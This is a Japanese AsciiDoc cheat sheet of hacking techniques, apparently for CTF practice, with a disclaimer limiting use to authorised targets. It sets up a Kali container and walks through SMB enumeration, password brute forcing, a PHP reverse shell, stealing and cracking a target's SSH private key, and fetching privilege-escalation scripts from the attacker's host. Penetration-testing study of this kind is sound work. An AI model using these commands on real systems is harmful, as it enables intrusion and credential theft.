//////////////////////////////
// Settings
//////////////////////////////
:idprefix:
:idseparator: -
ifndef::env-github[:icons: font]
ifdef::env-github[]
:status:
:outfilesuffix: .adoc
:caution-caption: :fire:
:important-caption: :exclamation:
:note-caption: :paperclip:
:tip-caption: :bulb:
:warning-caption: :warning:
endif::[]

//////////////////////////////
// Contents
//////////////////////////////
= CTF

[CAUTION]
====
KtokKawuは、自衛や検証/CTFのため、ハッキング技術を学習しています。 +
自分の管理外の端末や機器(一般に公開されているWebサイトや各種サーバやWi-Fiスポット、他人の端末や機器等)に対し、 +
非合法な目的で本リポジトリで公開しているツール類やテクニックを使用しないこと。 +
必ず自己責任の元、ローカル環境やCTF等で攻撃が許可されたサイトに対してのみ使用すること。 +
KtokKawuは、本リポジトリを利用する他のユーザや企業、団体等が起こした全ての事象に関して一切責任を負いません。
====

== Kali Dockerコンテナの作成

=== 初回の手順

[PowerShell/CMD]
----
# Kali Linuxの公式イメージDL
docker pull kalilinux/kali-rolling
docker images
# Dockerfileを使用する場合
docker image build -t kalilinux/kali-rolling:latest C:\path\to\Dockerfile
# コンテナ(初回)起動
docker run -it --name <C-NAME> kalilinux/kali-rolling
docker exec -it <CID> /bin/bash
# リポジトリの登録
echo "deb http://http.kali.org/kali kali-rolling main contrib non-free" > /etc/apt/sources.list \
&& echo "deb-src http://http.kali.org/kali kali-rolling main contrib non-free" >> /etc/apt/sources.list \
&& echo "deb http://http.kali.org/kali kali-last-snapshot main contrib non-free" >> /etc/apt/sources.list \
&& echo "deb http://http.kali.org/kali kali-experimental main contrib non-free" >> /etc/apt/sources.list
# Kali Linuxのパッケージインストール
apt -y update && apt -y upgrade
apt install -y kali-linux-full
# 他ツール、ライブラリ
apt install -y bash-completion build-essential bzip2 colordiff colortail curl exiftool gdb git iputils-ping iputils-tracepath jq libjpeg-dev libssl-dev libxml2-dev libxslt1-dev ltrace mariadb-client net-tools nodejs npm postgresql python-dev rlwrap smbclient steghide strace telnet tor vim wget yarnpkg zip zlib1g-dev
# apt install -y bash-completion build-essential bzip2 colordiff colortail libjpeg-dev libssl-dev nikto nmblookup pip python-pybloomfiltermmap rpcclient
# Setup gdb-peda
git clone https://github.com/longld/peda.git ~/peda \
&& echo "source ~/peda/peda.py" >> ~/.gdbinit
# Setup nmap CVE script
# Option Usage: --script=vulscan/vulscan.nse www.example.com
git clone https://github.com/scipag/vulscan ~/scipag_vulscan \
&& ln -s `pwd`/scipag_vulscan /usr/share/nmap/scripts/vulscan
# Install and configure AutoRecon
mkdir /tools \
&& git clone --depth 1 https://github.com/Tib3rius/AutoRecon.git /tools/AutoRecon \
&& cd /tools/AutoRecon \
&& pip3 install -r requirements.txt \
&& ln -s /tools/AutoRecon/src/autorecon/autorecon.py /usr/local/bin/autorecon
# Get some scripts
git clone https://github.com/pentestmonkey/php-reverse-shell ~/prh \
&& git clone https://github.com/lucyoa/kernel-exploits ~/exploits/ksploits \
&& git clone https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite ~/exploits/peass \
&& git clone https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack ~/exploits/unixploits \
&& git clone https://github.com/danielmiessler/SecLists /usr/share/seclists \
&& git clone https://github.com/andresriancho/w3af.git /opt/w3af \
/opt/w3af/w3af_console ; \
bash /tmp/w3af_dependency_install.sh ; \
echo 'export PATH=/opt/w3af:$PATH' >> /etc/profile
# Get Password list
mkdir ~/pwd-list \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/john.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/cain.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/conficker.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/500-worst-passwords.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/twitter-banned.txt.bz2 \
# Kaliイメージの「/usr/share/wordlists/rockyou.txt」の方が新しい
# && wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/phpbb.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/myspace.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/hotmail.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/faithwriters.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/elitehacker.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/hak5.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/alypaa.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/facebook-pastebay.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/porn-unknown.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/tuscl.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/facebook-phished.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/carders.cc.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/singles.org.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/english.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/german.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/us_cities.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/porno.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/honeynet.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/file-locations.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/fuzzing-strings.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/phpmyadmin-locations.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/web-extensions.txt.bz2 \
&& wget -P ~/pwd-list/ http://downloads.skullsecurity.org/passwords/web-mutations.txt.bz2 \
&& bzip2 -d ~/pwd-list/*.bz2
# コンテナ保存
docker stop <CID>
docker rename <CID> <C-NAME>
docker commit <CID> <REPO-NAME>:<TAG-NAME>
# コンテナ起動(ホスト側へポートフォワード)
docker images
docker run --name <C-NAME> -itd -p <HOST-PORT>:<C-PORT> /bin/bash <REPO-NAME>:<TAG-NAME>
docker ps -a
# 不要なコンテナ、イメージ削除
docker rm -f <CID>
docker rmi -f <IID>
----

=== 2回目以降のコンテナ利用

[PowerShell/CMD]
----
# コンテナ接続
docker exec -it <C-NAME> /bin/bash
# コンテナ開始/停止/再起動
docker stop/start/restart <C-NAME>
# IP確認
docker inspect --format '{{ .NetworkSettings.IPAddress }}' <C-NAME>
----
  
=== 注意事項

* Windows Firewallの受信規則のうち、パブリックの「com.docker.backend」が有効だと、 +
リバースシェルを張る時などのインバウンド通信が失敗してしまう。Linuxで構築する場合も同様。

== ハッキング技術メモ

=== ポートとOSSバージョンの確認

.SMBの例
----
https://medium.com/@arnavtripathy98/smb-enumeration-for-penetration-testing-e782a328bf1b
nmap -sC -p 139,445 -sV [TargetIP]
----

=== CVEのチェック

----
git clone https://github.com/scipag/vulscan scipag_vulscan
ln -s `pwd`/scipag_vulscan /usr/share/nmap/scripts/vulscan
nmap -sV -p [TargetPort] --script=vulscan/vulscan.nse www.example.com [TargetIP]
----

=== ログイン施行

★そのうち書く

=== Steganography

----
exiftool nothing.jpg
binwalk -e nothing.jpg
foremost nothing.jpg
steghide extract -sf nothing.jpg -p [password]
steghide --info nothing.jpg
----

=== SMB Attack

==== Tools

|===
|nmblookup|NetBIOS名の検索に使用されるNetBIOS over TCP / IPクライアントを収集
|smbclient|SMB共有ディレクトリにアクセスするftpのようなクライアント
|nmap|ポートスキャナ with スクリプト
|rpcclient|クライアント側のMS-RPC機能を実行するツール
|enum4linux|さまざまなsmb関数を列挙
|wireshark|「ntlmssp.ntlmv2_response」でフィルタリングしてNTLMv2のトラフィックからsmbの情報を取得可能
|===

==== チェックリスト

* ホスト名の確認
+
----
# -A オプション：look up by IP address
nmblookup -A [ip]
----
+
* 共有フォルダの一覧
+
----
# ホスト上の共有フォルダ一覧とアクセス権を表示
smbmap -H [ip/hostname] -R
# SMBからファイルを取得
smbmap -H [ip/hostname] -R --download '.\Anonymous\staff.txt'
# 資格情報を取得後に再実行し、新しいアクセス権を表示
smbmap -H [ip] -d [domain] -u [user] -p [password]
# nullログインをチェックするため、"exit"は現れる可能性のある全PW要求を処理する
# -L オプション：指定されたホストの共有のリストを取得します
echo exit | smbclient -L \\\\[ip]
# --script smb-enum-shares：特定のsmb列挙スクリプト
# -p 139,445：smbポートの指定
nmap --script smb-enum-shares -p 139,445 [ip]
----
+
* NULLセッションでの確認
+
----
# 資格情報無しで何ができるか確認
smbmap -H [ip/hostname]
# 本コマンドの後、RPCコマンドを入力してみる
# -U ""：NULLセッション
# -N オプション：PWD無し
rpcclient -U "" -N [ip]
# 共有フォルダへの接続試行、空PWDでも行ける可能性有り。
smbclient \\\\[ip]\\[share name]
----
+
* 脆弱性の確認
+
----
# --script smb-vuln*：全smb脆弱性スキャンスクリプトを実行
nmap --script smb-vuln* -p 139,445 [ip]
----
+
* SMB全体のスキャン
+
----
enum4linux -a [ip]
----
+
上記内容の確認で注目する内容は下記。
+
. nmblookup同様の出力
. nullセッションのチェック
. 共有フォルダのリスト
. ドメイン情報
. パスワードポリシー
. RIDサイクリング出力
* 手操作確認 +
smbのバージョンを取得するスクリプト
+
.smbver.sh
----
#!/bin/sh
# Author: rewardone
# Description:
#   Requires root or enough permissions to use tcpdump
#   Will listen for the first 7 packets of a null login and grab the SMB Version
# Notes:
#   Will sometimes not capture or will print multiple lines.
#   May need to run a second time for success.
# Usage:
#   smbver.sh [IP] (port) [Samba]
if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi
if [ ! -z $2 ]; then rport=$2; else rport=139; fi
tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'aUnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
sleep 0.5 && echo ""
----
+
上記スクリプトの結果が疑わしい時は、PCAPファイルから、smbバージョンを確認
+
----
# 例：Unix Samba 2.2.3a
check pcap
----

=== ディレクトリ検査

----
gobuster -e -u http://[TargetIP]/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -s 200,301,302,403,404 -e -x html,php,txt -l -o ./result_gobuster.txt
----

=== Bruteforce Attack

.Bruteforce tool list
|===
|ツール名
|サポートプロトコル

|Hydra
|TELNET, FTP, HTTP, HTTPS, HTTP-PROXY, SMB, SMBNT, MS-SQL, MYSQL, REXEC, irc, RSH, RLOGIN, CVS, SNMP, SMTP, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS, XMPP, ICQ, SAP/R3, LDAP2, LDAP3, Postgres, Teamspeak, Cisco auth, Cisco enable, AFP, Subversion/SVN, Firebird, LDAP2, Cisco AAA

|Medusa
|AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NetWare NCP, NNTP, PcAnywhere, POP3, PostgreSQL, REXEC, RLOGIN, RSH, SMBNT, SMTP-AUTH, SMTP-VRFY, SNMP, SSHv2, Subversion (SVN), Telnet, VMware Authentication Daemon (vmauthd), VNC, Generic Wrapper,
Web Form

|Ncrack
|RDP, SSH, http(s), SMB, pop3(s), VNC, FTP, telnet
|===

==== hydra

----
# -Vオプション：PWDマイニング中に2つのログイン+パスワードを表示
# -fオプション：指定したPWDが見つかったら停止
hydra -l [uname] -P ~/pwd-list/[pwdtext] [TargetIP] [TargetProtocol] -V -f
# 効率的には、およそssh(2/s) < ftp(6/s) < http-basic(100/s)の速さ
# パスワードスプレー攻撃も可能
----

==== ncrack

* RDPサービスに関してはhydraより早いらしい

----
ncrack -u [uname] -P ~/pwd-list/[pwdtext] -T5 [TargetIP] -p [TargetServicePort]
----

==== meduza

* 一番遅い

----
medusa -u [uname] -P ~/pwd-list/[pwdtext] -h [TargetIP] -M [TragetService]
----

=== Penetration

==== PHPリバースシェル

===== Scripts

https://github.com/pentestmonkey/php-reverse-shell

===== 手順

----
vim php-reverse-shell.php # change "$ip" value to [MyHostIP]
rlwrap nc -lvnp 1234
# Uploading PRS file & Web Access
----

==== RSAプライベートキーのクラック

----
scp [TargetUser]@[TargetIP]:/home/[TargetUser2]/.ssh/id_rsa /root/
/usr/share/john/ssh2john.py ./id_rsa > crack
john --format=SSH --wordlist=/usr/share/wordlists/rockyou.txt crack
john crack --show
chmod 600 id_rsa
----

=== 権限昇格

==== Scripts

. https://github.com/lucyoa/kernel-exploits
. https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
. https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack
. https://github.com/rebootuser/LinEnum

==== 手順

* ターゲット側でスクリプトを実行する際は、 +
使っているユーザ権限で自由にファイル授受できるディレクトリに移動するとよい。
+
.権限の緩いディレクトリの例
----
/var/tmp
/dev/shm
/var/lock
/run/lock
----

==== LinPEAS

----
# 攻撃者側
cd /var/tmp
wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh
python -m SimpleHTTPServer [MyHostPort]

# ターゲット側 
cd /var/tmp
wget http://[MyHostIP]:[MyHostPort]/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
----

===== LinEnum

----
# 攻撃者側
cd /var/tmp
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
python -m SimpleHTTPServer [MyHostPort]

# ターゲット側
cd /var/tmp
which wget
wget [MyHostIP]:[MyHostPort]/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh
----
